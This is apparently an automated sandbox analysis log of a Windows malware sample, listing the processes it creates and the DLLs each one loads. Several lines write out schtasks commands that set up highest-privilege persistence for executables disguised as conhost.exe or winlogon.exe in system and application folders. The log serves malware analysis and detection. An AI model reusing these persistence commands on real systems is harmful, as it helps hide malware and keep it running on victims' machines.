Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
Source: unknown Process created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe "C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 5 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 9 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\brokermonitordhcp\portruntime.exe "C:\brokermonitordhcp\portruntime.exe" Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: version.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: wldp.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: profapi.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: amsi.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: userenv.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: propsys.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: edputil.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: netutils.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: slc.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: sppc.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
